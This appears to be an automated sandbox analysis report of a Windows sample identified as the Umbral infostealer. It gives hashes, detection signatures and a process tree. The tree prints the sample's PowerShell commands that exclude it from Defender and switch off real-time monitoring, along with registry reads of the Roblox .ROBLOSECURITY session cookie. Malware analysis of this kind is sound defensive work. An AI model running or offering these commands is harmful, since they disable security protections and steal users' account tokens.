Analysis

  • max time kernel
    17s
  • max time network
    23s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    12-08-2024 09:27

General

  • Target

    citrontoppest/citrontoppest/updatechecker/updatecheckercitron.exe

  • Size

    227KB

  • MD5

    a6db1722b4ed09cd06fbdf6f80df47da

  • SHA1

    1fe86fceb4884cb37c4187591ccecd7a4c4d9c15

  • SHA256

    ed1deb13b32c20b6cd35d50351c78d3729315dac5da6f5795dae2c14bed8520b

  • SHA512

    61542031f6f60fca814400c9ec21c0eefa15422646c30b5b3192231a4d5a5845681f7d619818fa0c7c448f860101790d7971c80aa90637e58956b33023079785

  • SSDEEP

    6144:+loZMLrIkd8g+EtXHkv/iD4cYiL+cCFdWQj+ctBIpHb8e1mUi:ooZ0L+EP8cYiL+cCFdWQj+ctBIhK

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe
    "C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2240
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2816
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\citrontoppest\citrontoppest\updatechecker\updatecheckercitron.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2960
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:2144
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:436
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2232

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        ec286ba695ad926c878e44899129278e

        SHA1

        1a60f302ea3efcbf74f5a3b74bfc6fc3a0a05f8b

        SHA256

        5c75bec46f04728dc77c27fccd17f78666e17aeea81d0ffd802a579e94ff5e4c

        SHA512

        bc78284b927b82ce5a3ab48e076686fede1f746784e3c777ecf2959636f9ee8b4e3732484dec9af3e60b5d7caf83eefcb1db2b527a5d347980830ba732bd69ec

      • memory/436-43-0x00000000022A0000-0x00000000022A8000-memory.dmp

        Filesize

        32KB

      • memory/2240-0-0x000007FEF5643000-0x000007FEF5644000-memory.dmp

        Filesize

        4KB

      • memory/2240-1-0x0000000000DE0000-0x0000000000E20000-memory.dmp

        Filesize

        256KB

      • memory/2240-2-0x000007FEF5640000-0x000007FEF602C000-memory.dmp

        Filesize

        9.9MB

      • memory/2240-47-0x000007FEF5640000-0x000007FEF602C000-memory.dmp

        Filesize

        9.9MB

      • memory/2608-14-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

        Filesize

        2.9MB

      • memory/2608-15-0x0000000001E50000-0x0000000001E58000-memory.dmp

        Filesize

        32KB

      • memory/2880-7-0x000000001B310000-0x000000001B5F2000-memory.dmp

        Filesize

        2.9MB

      • memory/2880-8-0x00000000024E0000-0x00000000024E8000-memory.dmp

        Filesize

        32KB